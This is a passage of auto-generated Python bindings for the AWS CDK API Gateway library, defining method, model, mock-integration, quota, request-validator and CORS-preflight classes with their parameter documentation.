def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodDeploymentOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.MethodLoggingLevel")
class MethodLoggingLevel(enum.Enum):
OFF = "OFF"
ERROR = "ERROR"
INFO = "INFO"
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.MethodOptions", jsii_struct_bases=[], name_mapping={'api_key_required': 'apiKeyRequired', 'authorization_type': 'authorizationType', 'authorizer': 'authorizer', 'method_responses': 'methodResponses', 'operation_name': 'operationName', 'request_models': 'requestModels', 'request_parameters': 'requestParameters', 'request_validator': 'requestValidator'})
class MethodOptions():
def __init__(self, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None):
"""
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None open access
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format, for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
:param request_models: The resources that are used for the response's content type. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value
:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
"""
self._values = {
}
if api_key_required is not None: self._values["api_key_required"] = api_key_required
if authorization_type is not None: self._values["authorization_type"] = authorization_type
if authorizer is not None: self._values["authorizer"] = authorizer
if method_responses is not None: self._values["method_responses"] = method_responses
if operation_name is not None: self._values["operation_name"] = operation_name
if request_models is not None: self._values["request_models"] = request_models
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_validator is not None: self._values["request_validator"] = request_validator
@property
def api_key_required(self) -> typing.Optional[bool]:
"""Indicates whether the method requires clients to submit a valid API key.
default
:default: false
"""
return self._values.get('api_key_required')
@property
def authorization_type(self) -> typing.Optional["AuthorizationType"]:
"""Method authorization.
default
:default: None open access
"""
return self._values.get('authorization_type')
@property
def authorizer(self) -> typing.Optional["IAuthorizer"]:
"""If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource."""
return self._values.get('authorizer')
@property
def method_responses(self) -> typing.Optional[typing.List["MethodResponse"]]:
"""The responses that can be sent to the client who calls the method.
default
:default:
None
This property is not required, but if these are not supplied for a Lambda
proxy integration, the Lambda function must return a value of the correct format,
for the integration response to be correctly mapped to a response to the client.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-method-settings-method-response.html
"""
return self._values.get('method_responses')
@property
def operation_name(self) -> typing.Optional[str]:
"""A friendly operation name for the method.
For example, you can assign the
OperationName of ListPets for the GET /pets method.
"""
return self._values.get('operation_name')
@property
def request_models(self) -> typing.Optional[typing.Mapping[str,"IModel"]]:
"""The resources that are used for the response's content type.
Specify request
models as key-value pairs (string-to-string mapping), with a content type
as the key and a Model resource name as the value
"""
return self._values.get('request_models')
@property
def request_parameters(self) -> typing.Optional[typing.Mapping[str,bool]]:
"""The request parameters that API Gateway accepts.
Specify request parameters
as key-value pairs (string-to-Boolean mapping), with a source as the key and
a Boolean as the value. The Boolean specifies whether a parameter is required.
A source must match the format method.request.location.name, where the location
is querystring, path, or header, and name is a valid, unique parameter name.
default
:default: None
"""
return self._values.get('request_parameters')
@property
def request_validator(self) -> typing.Optional["IRequestValidator"]:
"""The ID of the associated request validator."""
return self._values.get('request_validator')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.MethodProps", jsii_struct_bases=[], name_mapping={'http_method': 'httpMethod', 'resource': 'resource', 'integration': 'integration', 'options': 'options'})
class MethodProps():
def __init__(self, *, http_method: str, resource: "IResource", integration: typing.Optional["Integration"]=None, options: typing.Optional["MethodOptions"]=None):
"""
:param http_method: The HTTP method ("GET", "POST", "PUT", ...) that clients use to call this method.
:param resource: The resource this method is associated with. For root resource methods, specify the ``RestApi`` object.
:param integration: The backend system that the method calls when it receives a request. Default: - a new ``MockIntegration``.
:param options: Method options. Default: - No options.
"""
if isinstance(options, dict): options = MethodOptions(**options)
self._values = {
'http_method': http_method,
'resource': resource,
}
if integration is not None: self._values["integration"] = integration
if options is not None: self._values["options"] = options
@property
def http_method(self) -> str:
"""The HTTP method ("GET", "POST", "PUT", ...) that clients use to call this method."""
return self._values.get('http_method')
@property
def resource(self) -> "IResource":
"""The resource this method is associated with.
For root resource methods,
specify the ``RestApi`` object.
"""
return self._values.get('resource')
@property
def integration(self) -> typing.Optional["Integration"]:
"""The backend system that the method calls when it receives a request.
default
:default: - a new ``MockIntegration``.
"""
return self._values.get('integration')
@property
def options(self) -> typing.Optional["MethodOptions"]:
"""Method options.
default
:default: - No options.
"""
return self._values.get('options')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.MethodResponse", jsii_struct_bases=[], name_mapping={'status_code': 'statusCode', 'response_models': 'responseModels', 'response_parameters': 'responseParameters'})
class MethodResponse():
def __init__(self, *, status_code: str, response_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, response_parameters: typing.Optional[typing.Mapping[str,bool]]=None):
"""
:param status_code: The method response's status code, which you map to an IntegrationResponse. Required.
:param response_models: The resources used for the response's content type. Specify response models as key-value pairs (string-to-string maps), with a content type as the key and a Model resource name as the value. Default: None
:param response_parameters: Response parameters that API Gateway sends to the client that called a method. Specify response parameters as key-value pairs (string-to-Boolean maps), with a destination as the key and a Boolean as the value. Specify the destination using the following pattern: method.response.header.name, where the name is a valid, unique header name. The Boolean specifies whether a parameter is required. Default: None
"""
self._values = {
'status_code': status_code,
}
if response_models is not None: self._values["response_models"] = response_models
if response_parameters is not None: self._values["response_parameters"] = response_parameters
@property
def status_code(self) -> str:
"""The method response's status code, which you map to an IntegrationResponse. Required."""
return self._values.get('status_code')
@property
def response_models(self) -> typing.Optional[typing.Mapping[str,"IModel"]]:
"""The resources used for the response's content type.
Specify response models as
key-value pairs (string-to-string maps), with a content type as the key and a Model
resource name as the value.
default
:default: None
"""
return self._values.get('response_models')
@property
def response_parameters(self) -> typing.Optional[typing.Mapping[str,bool]]:
"""Response parameters that API Gateway sends to the client that called a method. Specify response parameters as key-value pairs (string-to-Boolean maps), with a destination as the key and a Boolean as the value. Specify the destination using the following pattern: method.response.header.name, where the name is a valid, unique header name. The Boolean specifies whether a parameter is required.
default
:default: None
"""
return self._values.get('response_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodResponse(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
class MockIntegration(Integration, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.MockIntegration"):
"""This type of integration lets API Gateway return a response without sending the request further to the backend.
This is useful for API testing because it
can be used to test the integration set up without incurring charges for
using the backend and to enable collaborative development of an API. In
collaborative development, a team can isolate their development effort by
setting up simulations of API components owned by other teams by using the
MOCK integrations. It is also used to return CORS-related headers to ensure
that the API method permits CORS access. In fact, the API Gateway console
integrates the OPTIONS method to support CORS with a mock integration.
Gateway responses are other examples of mock integrations.
"""
def __init__(self, *, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_type: typing.Optional["ConnectionType"]=None, content_handling: typing.Optional["ContentHandling"]=None, credentials_passthrough: typing.Optional[bool]=None, credentials_role: typing.Optional[aws_cdk.aws_iam.IRole]=None, integration_responses: typing.Optional[typing.List["IntegrationResponse"]]=None, passthrough_behavior: typing.Optional["PassthroughBehavior"]=None, request_parameters: typing.Optional[typing.Mapping[str,str]]=None, request_templates: typing.Optional[typing.Mapping[str,str]]=None, vpc_link: typing.Optional["VpcLink"]=None) -> None:
"""
:param options: -
:param cache_key_parameters: A list of request parameters whose values are to be cached. It determines request parameters that will make it into the cache key.
:param cache_namespace: An API-specific tag group of related cached parameters.
:param connection_type: The type of network connection to the integration endpoint. Default: ConnectionType.Internet
:param content_handling: Specifies how to handle request payload content type conversions. Default: none if this property isn't defined, the request payload is passed through from the method request to the integration request without modification, provided that the ``passthroughBehaviors`` property is configured to support payload pass-through.
:param credentials_passthrough: Requires that the caller's identity be passed through from the request. Default: Caller identity is not passed through
:param credentials_role: An IAM role that API Gateway assumes. Mutually exclusive with ``credentialsPassThrough``. Default: A role is not assumed
:param integration_responses: The response that API Gateway provides after a method's backend completes processing a request. API Gateway intercepts the response from the backend so that you can control how API Gateway surfaces backend responses. For example, you can map the backend status codes to codes that you define.
:param passthrough_behavior: Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER.
:param request_parameters: The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value. Specify the destination by using the following pattern integration.request.location.name, where location is querystring, path, or header, and name is a valid, unique parameter name. The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on their destination in the request.
:param request_templates: A map of Apache Velocity templates that are applied on the request payload. The template that API Gateway uses is based on the value of the Content-Type header that's sent by the client. The content type value is the key, and the template is the value (specified as a string), such as the following snippet: { "application/json": "{\n "statusCode": "200"\n}" }
:param vpc_link: The VpcLink used for the integration. Required if connectionType is VPC_LINK.
"""
options = IntegrationOptions(cache_key_parameters=cache_key_parameters, cache_namespace=cache_namespace, connection_type=connection_type, content_handling=content_handling, credentials_passthrough=credentials_passthrough, credentials_role=credentials_role, integration_responses=integration_responses, passthrough_behavior=passthrough_behavior, request_parameters=request_parameters, request_templates=request_templates, vpc_link=vpc_link)
jsii.create(MockIntegration, self, [options])
@jsii.implements(IModel)
class Model(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Model"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api: "IRestApi", schema: "JsonSchema", content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, model_name: typing.Optional[str]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param rest_api: The rest API that this model is part of. The reason we need the RestApi object itself and not just the ID is because the model is being tracked by the top-level RestApi object for the purpose of calculating it's hash to determine the ID of the deployment. This allows us to automatically update the deployment when the model of the REST API changes.
:param schema: The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema.
:param content_type: The content type for the model. You can also force a content type in the request or response model mapping. Default: -
:param description: A description that identifies this model. Default: None
:param model_name: A name for the model. Important If you specify a name, you cannot perform updates that require replacement of this resource. You can perform updates that require no or some interruption. If you must replace the resource, specify a new name. Default: If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the model name. For more information, see Name Type.
"""
props = ModelProps(rest_api=rest_api, schema=schema, content_type=content_type, description=description, model_name=model_name)
jsii.create(Model, self, [scope, id, props])
@jsii.member(jsii_name="fromModelName")
@classmethod
def from_model_name(cls, scope: aws_cdk.core.Construct, id: str, model_name: str) -> "IModel":
"""
:param scope: -
:param id: -
:param model_name: -
"""
return jsii.sinvoke(cls, "fromModelName", [scope, id, model_name])
@classproperty
@jsii.member(jsii_name="EMPTY_MODEL")
def EMPTY_MODEL(cls) -> "IModel":
"""Represents a reference to a REST API's Empty model, which is available as part of the model collection by default.
This can be used for mapping
JSON responses from an integration to what is returned to a client,
where strong typing is not required. In the absence of any defined
model, the Empty model will be used to return the response payload
unmapped.
Definition
{
"$schema" : "http://json-schema.org/draft-04/schema#",
"title" : "Empty Schema",
"type" : "object"
}
see
:see: https://docs.amazonaws.cn/en_us/apigateway/latest/developerguide/models-mappings.html#models-mappings-models
"""
return jsii.sget(cls, "EMPTY_MODEL")
@classproperty
@jsii.member(jsii_name="ERROR_MODEL")
def ERROR_MODEL(cls) -> "IModel":
"""Represents a reference to a REST API's Error model, which is available as part of the model collection by default.
This can be used for mapping
error JSON responses from an integration to a client, where a simple
generic message field is sufficient to map and return an error payload.
Definition
{
"$schema" : "http://json-schema.org/draft-04/schema#",
"title" : "Error Schema",
"type" : "object",
"properties" : {
"message" : { "type" : "string" }
}
}
"""
return jsii.sget(cls, "ERROR_MODEL")
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
attribute:
:attribute:: true
"""
return jsii.get(self, "modelId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ModelOptions", jsii_struct_bases=[], name_mapping={'schema': 'schema', 'content_type': 'contentType', 'description': 'description', 'model_name': 'modelName'})
class ModelOptions():
def __init__(self, *, schema: "JsonSchema", content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, model_name: typing.Optional[str]=None):
"""
:param schema: The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema.
:param content_type: The content type for the model. You can also force a content type in the request or response model mapping. Default: -
:param description: A description that identifies this model. Default: None
:param model_name: A name for the model. Important If you specify a name, you cannot perform updates that require replacement of this resource. You can perform updates that require no or some interruption. If you must replace the resource, specify a new name. Default: If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the model name. For more information, see Name Type.
"""
if isinstance(schema, dict): schema = JsonSchema(**schema)
self._values = {
'schema': schema,
}
if content_type is not None: self._values["content_type"] = content_type
if description is not None: self._values["description"] = description
if model_name is not None: self._values["model_name"] = model_name
@property
def schema(self) -> "JsonSchema":
"""The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema."""
return self._values.get('schema')
@property
def content_type(self) -> typing.Optional[str]:
"""The content type for the model.
You can also force a
content type in the request or response model mapping.
default
:default: -
"""
return self._values.get('content_type')
@property
def description(self) -> typing.Optional[str]:
"""A description that identifies this model.
default
:default: None
"""
return self._values.get('description')
@property
def model_name(self) -> typing.Optional[str]:
"""A name for the model.
Important
If you specify a name, you cannot perform updates that
require replacement of this resource. You can perform
updates that require no or some interruption. If you
must replace the resource, specify a new name.
default
:default:
If you don't specify a name,
AWS CloudFormation generates a unique physical ID and
uses that ID for the model name. For more information,
see Name Type.
"""
return self._values.get('model_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ModelOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ModelProps", jsii_struct_bases=[ModelOptions], name_mapping={'schema': 'schema', 'content_type': 'contentType', 'description': 'description', 'model_name': 'modelName', 'rest_api': 'restApi'})
class ModelProps(ModelOptions):
def __init__(self, *, schema: "JsonSchema", content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, model_name: typing.Optional[str]=None, rest_api: "IRestApi"):
"""
:param schema: The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema.
:param content_type: The content type for the model. You can also force a content type in the request or response model mapping. Default: -
:param description: A description that identifies this model. Default: None
:param model_name: A name for the model. Important If you specify a name, you cannot perform updates that require replacement of this resource. You can perform updates that require no or some interruption. If you must replace the resource, specify a new name. Default: If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the model name. For more information, see Name Type.
:param rest_api: The rest API that this model is part of. The reason we need the RestApi object itself and not just the ID is because the model is being tracked by the top-level RestApi object for the purpose of calculating it's hash to determine the ID of the deployment. This allows us to automatically update the deployment when the model of the REST API changes.
"""
if isinstance(schema, dict): schema = JsonSchema(**schema)
self._values = {
'schema': schema,
'rest_api': rest_api,
}
if content_type is not None: self._values["content_type"] = content_type
if description is not None: self._values["description"] = description
if model_name is not None: self._values["model_name"] = model_name
@property
def schema(self) -> "JsonSchema":
"""The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema."""
return self._values.get('schema')
@property
def content_type(self) -> typing.Optional[str]:
"""The content type for the model.
You can also force a
content type in the request or response model mapping.
default
:default: -
"""
return self._values.get('content_type')
@property
def description(self) -> typing.Optional[str]:
"""A description that identifies this model.
default
:default: None
"""
return self._values.get('description')
@property
def model_name(self) -> typing.Optional[str]:
"""A name for the model.
Important
If you specify a name, you cannot perform updates that
require replacement of this resource. You can perform
updates that require no or some interruption. If you
must replace the resource, specify a new name.
default
:default:
If you don't specify a name,
AWS CloudFormation generates a unique physical ID and
uses that ID for the model name. For more information,
see Name Type.
"""
return self._values.get('model_name')
@property
def rest_api(self) -> "IRestApi":
"""The rest API that this model is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating it's
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return self._values.get('rest_api')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ModelProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.PassthroughBehavior")
class PassthroughBehavior(enum.Enum):
WHEN_NO_MATCH = "WHEN_NO_MATCH"
"""Passes the request body for unmapped content types through to the integration back end without transformation."""
NEVER = "NEVER"
"""Rejects unmapped content types with an HTTP 415 'Unsupported Media Type' response."""
WHEN_NO_TEMPLATES = "WHEN_NO_TEMPLATES"
"""Allows pass-through when the integration has NO content types mapped to templates.
However if there is at least one content type defined,
unmapped content types will be rejected with the same 415 response.
"""
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.Period")
class Period(enum.Enum):
"""Time period for which quota settings apply."""
DAY = "DAY"
WEEK = "WEEK"
MONTH = "MONTH"
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.QuotaSettings", jsii_struct_bases=[], name_mapping={'limit': 'limit', 'offset': 'offset', 'period': 'period'})
class QuotaSettings():
def __init__(self, *, limit: typing.Optional[jsii.Number]=None, offset: typing.Optional[jsii.Number]=None, period: typing.Optional["Period"]=None):
"""Specifies the maximum number of requests that clients can make to API Gateway APIs.
:param limit: The maximum number of requests that users can make within the specified time period. Default: none
:param offset: For the initial time period, the number of requests to subtract from the specified limit. Default: none
:param period: The time period for which the maximum limit of requests applies. Default: none
"""
self._values = {
}
if limit is not None: self._values["limit"] = limit
if offset is not None: self._values["offset"] = offset
if period is not None: self._values["period"] = period
@property
def limit(self) -> typing.Optional[jsii.Number]:
"""The maximum number of requests that users can make within the specified time period.
default
:default: none
"""
return self._values.get('limit')
@property
def offset(self) -> typing.Optional[jsii.Number]:
"""For the initial time period, the number of requests to subtract from the specified limit.
default
:default: none
"""
return self._values.get('offset')
@property
def period(self) -> typing.Optional["Period"]:
"""The time period for which the maximum limit of requests applies.
default
:default: none
"""
return self._values.get('period')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'QuotaSettings(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(IRequestValidator)
class RequestValidator(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.RequestValidator"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api: "IRestApi", request_validator_name: typing.Optional[str]=None, validate_request_body: typing.Optional[bool]=None, validate_request_parameters: typing.Optional[bool]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param rest_api: The rest API that this model is part of. The reason we need the RestApi object itself and not just the ID is because the model is being tracked by the top-level RestApi object for the purpose of calculating it's hash to determine the ID of the deployment. This allows us to automatically update the deployment when the model of the REST API changes.
:param request_validator_name: The name of this request validator. Default: None
:param validate_request_body: Indicates whether to validate the request body according to the configured schema for the targeted API and method. Default: false
:param validate_request_parameters: Indicates whether to validate request parameters. Default: false
"""
props = RequestValidatorProps(rest_api=rest_api, request_validator_name=request_validator_name, validate_request_body=validate_request_body, validate_request_parameters=validate_request_parameters)
jsii.create(RequestValidator, self, [scope, id, props])
@jsii.member(jsii_name="fromRequestValidatorId")
@classmethod
def from_request_validator_id(cls, scope: aws_cdk.core.Construct, id: str, request_validator_id: str) -> "IRequestValidator":
"""
:param scope: -
:param id: -
:param request_validator_id: -
"""
return jsii.sinvoke(cls, "fromRequestValidatorId", [scope, id, request_validator_id])
@property
@jsii.member(jsii_name="requestValidatorId")
def request_validator_id(self) -> str:
"""ID of the request validator, such as abc123.
attribute:
:attribute:: true
"""
return jsii.get(self, "requestValidatorId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.RequestValidatorOptions", jsii_struct_bases=[], name_mapping={'request_validator_name': 'requestValidatorName', 'validate_request_body': 'validateRequestBody', 'validate_request_parameters': 'validateRequestParameters'})
class RequestValidatorOptions():
def __init__(self, *, request_validator_name: typing.Optional[str]=None, validate_request_body: typing.Optional[bool]=None, validate_request_parameters: typing.Optional[bool]=None):
"""
:param request_validator_name: The name of this request validator. Default: None
:param validate_request_body: Indicates whether to validate the request body according to the configured schema for the targeted API and method. Default: false
:param validate_request_parameters: Indicates whether to validate request parameters. Default: false
"""
self._values = {
}
if request_validator_name is not None: self._values["request_validator_name"] = request_validator_name
if validate_request_body is not None: self._values["validate_request_body"] = validate_request_body
if validate_request_parameters is not None: self._values["validate_request_parameters"] = validate_request_parameters
@property
def request_validator_name(self) -> typing.Optional[str]:
"""The name of this request validator.
default
:default: None
"""
return self._values.get('request_validator_name')
@property
def validate_request_body(self) -> typing.Optional[bool]:
"""Indicates whether to validate the request body according to the configured schema for the targeted API and method.
default
:default: false
"""
return self._values.get('validate_request_body')
@property
def validate_request_parameters(self) -> typing.Optional[bool]:
"""Indicates whether to validate request parameters.
default
:default: false
"""
return self._values.get('validate_request_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'RequestValidatorOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.RequestValidatorProps", jsii_struct_bases=[RequestValidatorOptions], name_mapping={'request_validator_name': 'requestValidatorName', 'validate_request_body': 'validateRequestBody', 'validate_request_parameters': 'validateRequestParameters', 'rest_api': 'restApi'})
class RequestValidatorProps(RequestValidatorOptions):
def __init__(self, *, request_validator_name: typing.Optional[str]=None, validate_request_body: typing.Optional[bool]=None, validate_request_parameters: typing.Optional[bool]=None, rest_api: "IRestApi"):
"""
:param request_validator_name: The name of this request validator. Default: None
:param validate_request_body: Indicates whether to validate the request body according to the configured schema for the targeted API and method. Default: false
:param validate_request_parameters: Indicates whether to validate request parameters. Default: false
:param rest_api: The rest API that this model is part of. The reason we need the RestApi object itself and not just the ID is because the model is being tracked by the top-level RestApi object for the purpose of calculating it's hash to determine the ID of the deployment. This allows us to automatically update the deployment when the model of the REST API changes.
"""
self._values = {
'rest_api': rest_api,
}
if request_validator_name is not None: self._values["request_validator_name"] = request_validator_name
if validate_request_body is not None: self._values["validate_request_body"] = validate_request_body
if validate_request_parameters is not None: self._values["validate_request_parameters"] = validate_request_parameters
@property
def request_validator_name(self) -> typing.Optional[str]:
"""The name of this request validator.
default
:default: None
"""
return self._values.get('request_validator_name')
@property
def validate_request_body(self) -> typing.Optional[bool]:
"""Indicates whether to validate the request body according to the configured schema for the targeted API and method.
default
:default: false
"""
return self._values.get('validate_request_body')
@property
def validate_request_parameters(self) -> typing.Optional[bool]:
"""Indicates whether to validate request parameters.
default
:default: false
"""
return self._values.get('validate_request_parameters')
@property
def rest_api(self) -> "IRestApi":
"""The rest API that this model is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating it's
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return self._values.get('rest_api')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'RequestValidatorProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(IResource)
class ResourceBase(aws_cdk.core.Resource, metaclass=jsii.JSIIAbstractClass, jsii_type="@aws-cdk/aws-apigateway.ResourceBase"):
@staticmethod
def __jsii_proxy_class__():
return _ResourceBaseProxy
def __init__(self, scope: aws_cdk.core.Construct, id: str) -> None:
"""
:param scope: -
:param id: -
"""
jsii.create(ResourceBase, self, [scope, id])
@jsii.member(jsii_name="addCorsPreflight")
def add_cors_preflight(self, *, allow_origins: typing.List[str], allow_credentials: typing.Optional[bool]=None, allow_headers: typing.Optional[typing.List[str]]=None, allow_methods: typing.Optional[typing.List[str]]=None, disable_cache: typing.Optional[bool]=None, expose_headers: typing.Optional[typing.List[str]]=None, max_age: typing.Optional[aws_cdk.core.Duration]=None, status_code: typing.Optional[jsii.Number]=None) -> "Method":
"""Adds an OPTIONS method to this resource which responds to Cross-Origin Resource Sharing (CORS) preflight requests.
Cross-Origin Resource Sharing (CORS) is a mechanism that uses additional
HTTP headers to tell browsers to give a web application running at one
origin, access to selected resources from a different origin. A web
application executes a cross-origin HTTP request when it requests a
resource that has a different origin (domain, protocol, or port) from its
own.
:param options: -
:param allow_origins: Specifies the list of origins that are allowed to make requests to this resource. If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or ``[ * ]``. Responses will include the ``Access-Control-Allow-Origin`` response header. If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will also be included.
:param allow_credentials: The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include". When a request's credentials mode (Request.credentials) is "include", browsers will only expose the response to frontend JavaScript code if the Access-Control-Allow-Credentials value is true. Credentials are cookies, authorization headers or TLS client certificates. Default: false
:param allow_headers: The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request. Default: Cors.DEFAULT_HEADERS
:param allow_methods: The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request. If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``. Default: Cors.ALL_METHODS
:param disable_cache: Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``. Default: - cache is enabled
:param expose_headers: The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names. If you want clients to be able to access other headers, you have to list them using the Access-Control-Expose-Headers header. Default: - only the 6 CORS-safelisted response headers are exposed: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma
:param max_age: The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached. To disable caching altogther use ``disableCache: true``. Default: - browser-specific (see reference)
:param status_code: Specifies the response status code returned from the OPTIONS method. Default: 204
"""
options = CorsOptions(allow_origins=allow_origins, allow_credentials=allow_credentials, allow_headers=allow_headers, allow_methods=allow_methods, disable_cache=disable_cache, expose_headers=expose_headers, max_age=max_age, status_code=status_code)
return jsii.invoke(self, "addCorsPreflight", [options])
@jsii.member(jsii_name="addMethod")
def add_method(self, http_method: str, integration: typing.Optional["Integration"]=None, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None) -> "Method":
"""Defines a new method for this resource.
:param http_method: -
:param integration: -
:param options: -
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None open access
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format, for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
:param request_models: The resources that are used for the response's content type. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value
